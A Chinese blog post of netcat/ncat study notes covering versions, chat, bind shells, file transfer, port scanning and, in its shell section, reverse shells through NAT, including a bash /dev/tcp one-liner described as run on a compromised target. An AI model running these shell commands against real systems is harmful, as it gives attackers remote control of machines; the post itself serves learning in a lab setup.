nc命令学习记录

nc被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。

简介

nc被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。

版本区别

nc的版本非常乱,有很多版本,他们分别由不同的作者编写。

netcat-traditional

这个是最早的版本,最新版本是2007年1月,版本是1.10,Kali Linux默认带的就是这个版本:

root@kali-linux:~# nc -h
[v1.10-41.1]

这个版本的nc具有-e选项,十分方便反弹shell使用

netcat-openbsd

ubuntu里默认的nc命令指向的是netcat-openbsd。这个版本因为考虑到安全性等原因没有-e选项。所以我们得手动替换一下nc的版本:

# 安装传统的netcat
$ sudo apt-get install netcat

# 切换版本
$ sudo update-alternatives --config nc
[sudo] sqlsec 的密码: 
有 2 个候选项可用于替换 nc (提供 /bin/nc)。

  选择       路径               优先级  状态
------------------------------------------------------------
  0            /bin/nc.openbsd       50        自动模式
  1            /bin/nc.openbsd       50        手动模式
* 2            /bin/nc.traditional   10        手动模式

要维持当前值[*]请按<回车键>,或者键入选择的编号:2

ncat

这是netcat的比较新的现代版本,它是从头开始编写的,不使用原始的netcat代码。ncat的作者是着名的Nmap程序的作者。ncat几乎重复了原始程序的所有功能,并包含其他功能。CentOS、Red Hat默认带的是ncat。目前ncat已经集成到了nmap里面,安装完nmap后就可以使用ncat命令了。

用法

本用法全部基于ncat命令来做的记录,其他版本的nc可能会有些许差别。

实验环境

操作系统 IP地址
Ubuntu 18.04 10.211.55.14
macOS 10.13.6 10.211.55.2

文字交互

监听入站连接

-l:使用监听模式,监控传入的信息

# sqlsec @ X1cT34m-iMac in ~ 
$ ncat -l 2333

此刻macOS就会在监听本地2333端口的入站连接。

连接远程系统

尝试实验nc在Ubuntu系统下来连接macOS的2333端口:

# sqlsec @ ubuntu in ~ 
$ ncat 10.211.55.2 2333

现在就可以通过nc来聊天来,任何一方输入的内容都会被另一方看到:

任一方按Ctrl+C即可终止这尴尬的聊天。

命令交互

基本交互

-e:将传入的信息以命令执行

在macOS上运行如下命令,将/bin/bash通过2333端口来监听,将收到的信息都发送到/bin/bash

# sqlsec @ X1cT34m-iMac in ~ [22:09:34]
$ ncat -l -e /bin/bash 2333

Ubuntu系统这边依然向往常一样来连接macOS的2333端口,只是此时Ubutnu输入的指令都会传入macOS的/bin/bash 执行成功后会返回信息,类似于ssh操作连接来macOS一样:

# sqlsec @ ubuntu in ~ [22:13:49] C:130
$ ncat 10.211.55.2 2333
whoami
sqlsec
pwd
/Users/sqlsec
id
uid=501(sqlsec) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserver
adm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.a
ccess_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)
uname -a
Darwin X1cT34m-iMac 17.7.0 Darwin Kernel Version 17.7.0: Wed Apr 24 21:17:24 PDT 2019; root:xnu-4570.71.45~1/RELEASE_X86_64 x86_64

持久监听

-k: 客户端断掉连接时,服务端依然保持运行
-v:现实指令执行过程细节

在macOS开启一个持久监听的nc

# sqlsec @ X1cT34m-iMac in ~ 
$ ncat -lvk -e  /bin/bash 2333

此时使用Ubuntu去连接macOS:

# sqlsec @ ubuntu in ~ 
$ ncat 10.211.55.2 2333

当Ubuntu客户端使用CTRL + cCTRL + d断开连接的时候,macOS的ncat依然在运行,这样方便Ubuntu下次直接nc连进来。

内网弹shell

ncat简单调整是可以穿内网的

操作系统 IP地址
macOS 10.13.6 内网
CentOS www.sqlsec.com

首先外网的CentOS服务器先监听本地端口:

-w: 设置等待连线的时间秒数

# root @ x1ct34m in ~ 
$ ncat -lv 2333        
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::2333
Ncat: Listening on 0.0.0.0:2333

内网的macOS运行:

# sqlsec @ X1cT34m-iMac in ~
$ ncat -w 10 -e /bin/bash www.sqlsec.com 2333

此时CentOS这边已经接受到了内网到macOS的bash了,可以交互执行masOS的命令:

bash弹shell

如果控制的目标机器自带的nc不支持-e选项,那如何将shell弹出去呢?这里可以利用自带的bash命令交互环境来实现这个操作:

攻击者外网监听:

-p port 本地端口

# 使用nc命令的话得添加 -p 指定端口这个选项
nc -lvp 2333

# ncat用法不变
ncat -lv 2333

被入侵的目标机器执行如下命令:

bash -i >& /dev/tcp/10.211.55.4/2333 0>&1

这条命令的作用等同于之前的ncat -w 10 -e /bin/bash 10.211.55.4 2333

命令 参数解释
bash -i 产生一个bash交互环境
>& 将联合符号前面的内容与后面结合然后一起重定向给后者
/dev/tcp/10.211.55.4/2333 让目标主机与主机10.211.55.4的2333端口简历一个连接
0>&1 将标准的输入与标准输出内容相结合,然后重定向给前面的标准输出内容

文件传输

操作系统 IP地址
macOS 10.13.6 内网
CentOS www.sqlsec.com

上传文件到远程

CentOS远程服务器运行:

# root @ x1ct34m in ~ 
$ ncat -l 2333 > hello.txt

macOS本地运行:

# sqlsec @ X1cT34m-iMac in ~
$ ncat www.sqlsec.com 2333 < hello.txt

此时会将macOS的文件传输到远程的CentOS服务器上,传输完成后,两个ncat会话都将终止。

从远程下载文件

CentOS远程服务器运行:

# root @ x1ct34m in ~
$ ncat -l 2333 < hello.txt 

macOS本地运行:

# sqlsec @ X1cT34m-iMac in ~
$ ncat www.sqlsec.com 2333 > hello.txt

请注意,这里文件传输完成后不会显示任何内容,并且两个Ncat实例将继续工作。

端口扫描

范围扫描

ncat不支持端口扫描,但是原始的nc可以扫描端口。

-n: 直接使用ip地址,而不通过域名服务器
-z: 使用0输入/输出模式,只在扫描通信端口时使用

这里扫描10.211.55.14的20-25这个端口范围:

# sqlsec @ X1cT34m-iMac in ~
$ nc -v -n -z 10.211.55.14 20-25
10.211.55.14 22 (ssh) open

可以发现成功扫描出22端口是开放的了

单个扫描

# sqlsec @ X1cT34m-iMac in ~
$ nc -v -z -n 10.211.55.14 22 
10.211.55.14 22 (ssh) open

nc的命令可以写在一起的,下面两条命令的作用相同:

$ nc -v -z -n 10.211.55.14 22 
$ nc -vzn 10.211.55.14 22

详细参数

Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
  -4                         Use IPv4 only
  -6                         Use IPv6 only
  -U, --unixsock             Use Unix domain sockets only
  -C, --crlf                 Use CRLF for EOL sequence
  -c, --sh-exec     Executes the given command via /bin/sh
  -e, --exec        Executes the given command
      --lua-exec   Executes the given Lua script
  -g hop1[,hop2,...]         Loose source routing hop points (8 max)
  -G                      Loose source routing hop pointer (4, 8, 12, ...)
  -m, --max-conns         Maximum  simultaneous connections
  -h, --help                 Display this help screen
  -d, --delay 

文章作者: 国光
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 国光 !
 上一篇
Docker温故知新 Docker温故知新
Docker目前用的越来越多,前段时间接到一个项目:使用Docker部署AWD靶场,实际操作起来还是有很多细节的,这里特地总结一下,写给自己看。 Docker安装这里我只写Ubuntu、Kali/Debian、CentOS下的安装,m
2019-10-28
下一篇 
NCTF 2018部分Writeup NCTF 2018部分Writeup
这次校赛收获了很多,题目质量感觉很高,在没有二进制手的情况下,我们打了校外队伍第9名,对于一向很菜鸡的我感觉很满意了,已经使出洪荒之力了。希望自己进步速度更快一点吧,否则要被自己的学弟们超过会很尴尬的鸭! Web签到题有点坑,没想到是直
2018-11-26
  目录